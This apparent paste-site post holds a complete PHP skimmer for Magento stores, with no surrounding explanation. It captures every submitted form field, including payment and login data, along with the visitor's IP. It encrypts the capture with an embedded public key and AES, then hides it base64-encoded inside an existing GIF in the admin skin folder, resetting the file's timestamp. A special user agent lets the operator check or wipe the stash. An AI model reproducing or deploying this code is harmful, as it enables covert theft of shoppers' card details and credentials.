From carco, 10 Months ago, written in JavaScript.
  1. <?php
  2. $y0 = './skin/adminhtml/default/default/images/btn_gr_on_bg.gif';
  3. $m1 = '1395938332';
  4. $k2 = 'p2289905';
  5. $k3 = "-----BEGIN PUBLIC KEY-----\nMIGeMA0GCSqGSIb3DQEBAQUAA4GMADCBiAKBgFiKhzEGVUxLdkdAPmTVH74QwWBk\n0cDppNX3n0fmVZyBPcYZ5YIbEeSLIOCXKb5xT/ZrwYyk13jMIho9WPlLRJdxT2Rj\nbcMvXszvWBwh1lCovrl6/kulIq5ZcnDFdlcKzW2PR/19+gkKhRGk1YUXMLgw6EFj\nj2c1LJoSpnzk8WRFAgMBAAE=\n-----END PUBLIC KEY-----";
  6.  
  7. if (@$_SERVER['HTTP_USER_AGENT'] == 'Visbot/2.0 (+http://www.visvo.com/en/webmasters.jsp;[email protected])') {
  8.     if (isset($_GET[$k2])) {
  9.         $m1 = file_exists($y0) ? @filemtime($y0) : $m1;
  10.         @file_put_contents($y0, '');
  11.         @touch($y0, $m1, $m1);
  12.         echo 'clean ok';
  13.     }
  14.     else echo 'Pong';
  15.     exit;
  16. }
  17.  
  18. if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
  19.     $i4 = $_SERVER['HTTP_CLIENT_IP'];
  20. }
  21. elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
  22.     $i4 = $_SERVER['HTTP_X_FORWARDED_FOR'];
  23. }
  24. else {
  25.     $i4 = @$_SERVER['REMOTE_ADDR'];
  26. }
  27.  
  28. if (isset($_POST) && sizeof($_POST)) {
  29.     $a5 = '';
  30.     foreach($_POST as $h6 => $n7) {
  31.         if (is_array($n7)) {
  32.             foreach($n7 as $f8 => $l9) {
  33.                 if (is_array($l9)) {
  34.                     foreach($l9 as $l10 => $v11) {
  35.                         if (is_array($v11)) {;
  36.                         }
  37.                         else {
  38.                             $a5.= ':' . $h6 . '[' . $f8 . '][' . $l10 . ']=' . $v11;
  39.                         }
  40.                     }
  41.                 }
  42.                 else {
  43.                     $a5.= ':' . $h6 . '[' . $f8 . ']=' . $l9;
  44.                 }
  45.             }
  46.         }
  47.         else {
  48.             $a5.= ':' . $h6 . '=' . $n7;
  49.         }
  50.     }
  51.  
  52.     $a5 = $i4 . $a5;
  53. }
  54. else {
  55.     $a5 = null;
  56. }
  57.  
  58. if ($a5) {
  59.     $t12 = false;
  60.     if (function_exists('openssl_get_publickey') && function_exists('openssl_public_encrypt') && function_exists('openssl_encrypt')) {
  61.         $t12 = true;
  62.     }
  63.     elseif (function_exists('dl')) {
  64.         $n13 = strtolower(substr(php_uname() , 0, 3));
  65.         $d14 = 'php_openssl.' . ($n13 == 'win' ? 'dll' : 'so');
  66.         @dl($d14);
  67.         if (function_exists('openssl_get_publickey') && function_exists('openssl_public_encrypt') && function_exists('openssl_encrypt')) {
  68.             $t12 = true;
  69.         }
  70.     }
  71.  
  72.     if ($t12) {
  73.         $t15 = @openssl_get_publickey($k3);
  74.         $q16 = 128;
  75.         $t17 = '';
  76.         $h18 = md5(md5(microtime()) . rand());
  77.         $e19 = $h18;
  78.         while ($e19) {
  79.             $f20 = substr($e19, 0, $q16);
  80.             $e19 = substr($e19, $q16);
  81.             @openssl_public_encrypt($f20, $h21, $t15);
  82.             $t17.= $h21;
  83.         }
  84.  
  85.         $t22 = @openssl_encrypt($a5, 'aes128', $h18);
  86.         @openssl_free_key($t15);
  87.         $a5 = $t17 . ':::SEP:::' . $t22;
  88.     }
  89.  
  90.     $m1 = file_exists($y0) ? @filemtime($y0) : $m1;
  91.     @file_put_contents($y0, 'JPEG-1.1' . base64_encode($a5) , FILE_APPEND);
  92.     @touch($y0, $m1, $m1);
  93. }
  94. ?>